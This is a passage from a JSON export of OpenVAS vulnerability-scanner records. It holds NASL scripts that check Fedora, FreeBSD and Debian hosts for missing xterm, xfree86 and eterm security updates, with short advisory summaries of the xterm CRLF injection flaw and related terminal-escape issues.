Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis update fixes the following security issue: CRLF injection vulnerability\nin xterm allows user-assisted attackers to execute arbitrary commands via LF\n(aka \\n) characters surrounding a command name within a Device Control Request\nStatus String (DECRQSS) escape sequence in a text file, a related issue to\nCVE-2003-0063 and CVE-2003-0071.\n\nChangeLog:\n\n* Tue Jan 6 2009 Miroslav Lichvar 238-1\n- update to 238 (#479000, CVE-2008-2383)\n- set default values of allowWindowOps and allowFontOps resources to false\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update xterm' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-0091\";\ntag_summary = \"The remote host is missing an update to xterm\nannounced via advisory FEDORA-2009-0091.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63120\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-07 23:16:01 +0100 (Wed, 07 Jan 2009)\");\n script_cve_id(\"CVE-2003-0063\", \"CVE-2003-0071\", \"CVE-2008-2383\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-0091 (xterm)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=479000\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"xterm\", rpm:\"xterm~238~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xterm-debuginfo\", rpm:\"xterm-debuginfo~238~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:55", "description": "The remote host is missing an update to xterm\nannounced via advisory FEDORA-2009-0154.", "cvss3": {}, "published": "2009-01-07T00:00:00", "type": "openvas", "title": "Fedora Core 8 FEDORA-2009-0154 (xterm)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2383", "CVE-2003-0071", "CVE-2003-0063"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063121", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063121", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_0154.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-0154 (xterm)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis update fixes the following security issue: CRLF injection vulnerability\nin xterm allows user-assisted attackers to execute arbitrary commands via LF\n(aka \\n) characters surrounding a command name within a Device Control Request\nStatus String (DECRQSS) escape sequence in a text file, a related issue to\nCVE-2003-0063 and CVE-2003-0071.\n\nChangeLog:\n\n* Tue Jan 6 2009 Miroslav Lichvar 238-1\n- update to 238 (#479000, CVE-2008-2383)\n- set default values of allowWindowOps and allowFontOps resources to false\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update xterm' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-0154\";\ntag_summary = \"The remote host is missing an update to xterm\nannounced via advisory FEDORA-2009-0154.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63121\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-07 23:16:01 +0100 (Wed, 07 Jan 2009)\");\n script_cve_id(\"CVE-2003-0063\", \"CVE-2003-0071\", \"CVE-2008-2383\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 8 FEDORA-2009-0154 (xterm)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=479000\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"xterm\", rpm:\"xterm~238~1.fc8\", rls:\"FC8\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xterm-debuginfo\", rpm:\"xterm-debuginfo~238~1.fc8\", rls:\"FC8\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:58", "description": "The remote host is missing an update to xterm\nannounced via advisory FEDORA-2009-0154.", "cvss3": {}, "published": "2009-01-07T00:00:00", "type": "openvas", "title": "Fedora Core 8 FEDORA-2009-0154 (xterm)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2383", "CVE-2003-0071", "CVE-2003-0063"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:63121", "href": "http://plugins.openvas.org/nasl.php?oid=63121", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_0154.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-0154 (xterm)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis update fixes the following security issue: CRLF injection vulnerability\nin xterm allows user-assisted attackers to execute arbitrary commands via LF\n(aka \\n) characters surrounding a command name within a Device Control Request\nStatus String (DECRQSS) escape sequence in a text file, a related issue to\nCVE-2003-0063 and CVE-2003-0071.\n\nChangeLog:\n\n* Tue Jan 6 2009 Miroslav Lichvar 238-1\n- update to 238 (#479000, CVE-2008-2383)\n- set default values of allowWindowOps and allowFontOps resources to false\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update xterm' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-0154\";\ntag_summary = \"The remote host is missing an update to xterm\nannounced via advisory FEDORA-2009-0154.\";\n\n\n\nif(description)\n{\n script_id(63121);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-07 23:16:01 +0100 (Wed, 07 Jan 2009)\");\n script_cve_id(\"CVE-2003-0063\", \"CVE-2003-0071\", \"CVE-2008-2383\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 8 FEDORA-2009-0154 (xterm)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=479000\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"xterm\", rpm:\"xterm~238~1.fc8\", rls:\"FC8\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xterm-debuginfo\", rpm:\"xterm-debuginfo~238~1.fc8\", rls:\"FC8\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:09", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2009-01-07T00:00:00", "type": "openvas", "title": "FreeBSD Ports: xterm", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2383", "CVE-2003-0071", "CVE-2003-0063"], "modified": "2016-12-28T00:00:00", "id": "OPENVAS:63104", "href": "http://plugins.openvas.org/nasl.php?oid=63104", "sourceData": "#\n#VID d5e1aac8-db0b-11dd-ae30-001cc0377035\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID d5e1aac8-db0b-11dd-ae30-001cc0377035\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: xterm\n\nCVE-2008-2383\nCRLF injection vulnerability in xterm allows user-assisted attackers\nto execute arbitrary commands via LF (aka \\n) characters surrounding a\ncommand name within a Device Control Request Status String (DECRQSS)\nescape sequence in a text file, a related issue to CVE-2003-0063 and\nCVE-2003-0071.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030\nhttp://www.vuxml.org/freebsd/d5e1aac8-db0b-11dd-ae30-001cc0377035.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(63104);\n script_version(\"$Revision: 4865 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-28 17:16:43 +0100 (Wed, 28 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-07 23:16:01 +0100 (Wed, 07 Jan 2009)\");\n script_cve_id(\"CVE-2008-2383\");\n script_bugtraq_id(33060);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: xterm\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"xterm\");\nif(!isnull(bver) && revcomp(a:bver, b:\"238\")<0) {\n txt += 'Package xterm version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:17", "description": "The remote host is missing an update to xfree86\nannounced via advisory DSA 380-1.", "cvss3": {}, "published": "2008-01-17T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 380-1 (xfree86)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0071", "CVE-2003-0063", "CVE-2003-0730", "CVE-2002-0164"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:53665", "href": "http://plugins.openvas.org/nasl.php?oid=53665", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_380_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 380-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Four vulnerabilities have been discovered in XFree86.\n\nFor a more detailed description of the problems addressed,\nplease visit the referenced security advisory.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 4.1.0-16woody1.\n\nFor the unstable distribution (sid) all problems except CVE-2003-0730\nare fixed in version 4.2.1-11. CVE-2003-0730 will be fixed in\n4.2.1-12, currently in preparation.\n\nWe recommend that you update your xfree86 package.\";\ntag_summary = \"The remote host is missing an update to xfree86\nannounced via advisory DSA 380-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20380-1\";\n\nif(description)\n{\n script_id(53665);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2003-0063\", \"CVE-2003-0071\", \"CVE-2002-0164\", \"CVE-2003-0730\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 380-1 (xfree86)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"x-window-system\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xfonts-100dpi-transcoded\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xfonts-100dpi\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xfonts-75dpi-transcoded\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xfonts-75dpi\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xfonts-base-transcoded\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xfonts-base\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xfonts-cyrillic\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xfonts-pex\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xfonts-scalable\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xfree86-common\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xlib6g-dev\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xlib6g\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xspecs\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lbxproxy\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdps-dev\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdps1\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdps1-dbg\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxaw6\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxaw6-dbg\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxaw6-dev\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxaw7\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxaw7-dbg\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxaw7-dev\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proxymngr\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"twm\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"x-window-system-core\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xbase-clients\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xdm\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xfs\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xfwp\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xlibmesa-dev\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xlibmesa3\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xlibmesa3-dbg\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xlibosmesa-dev\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xlibosmesa3\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xlibosmesa3-dbg\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xlibs\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xlibs-dbg\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xlibs-dev\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xlibs-pic\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xmh\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xnest\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xprt\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xserver-common\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xserver-xfree86\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xterm\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xutils\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xvfb\", ver:\"4.1.0-16woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:15", "description": "The remote host is missing an update to eterm\nannounced via advisory DSA 496-1.", "cvss3": {}, "published": "2008-01-17T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 496-1 (eterm)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0068"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:53186", "href": "http://plugins.openvas.org/nasl.php?oid=53186", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_496_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 496-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"H.D. Moore discovered several terminal emulator security issues. One\nof them covers escape codes that are interepreted by the terminal\nemulator. This could be exploited by an attacker to insert malicious\ncommands hidden for the user, who has to hit enter to continue, which\nwould also execute the hidden commands.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 0.9.2-0pre2002042903.3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion eterm-0.9.2-6.\n\nWe recommend that you upgrade your eterm package.\";\ntag_summary = \"The remote host is missing an update to eterm\nannounced via advisory DSA 496-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20496-1\";\n\nif(description)\n{\n script_id(53186);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(10237);\n script_cve_id(\"CVE-2003-0068\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 496-1 (eterm)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : 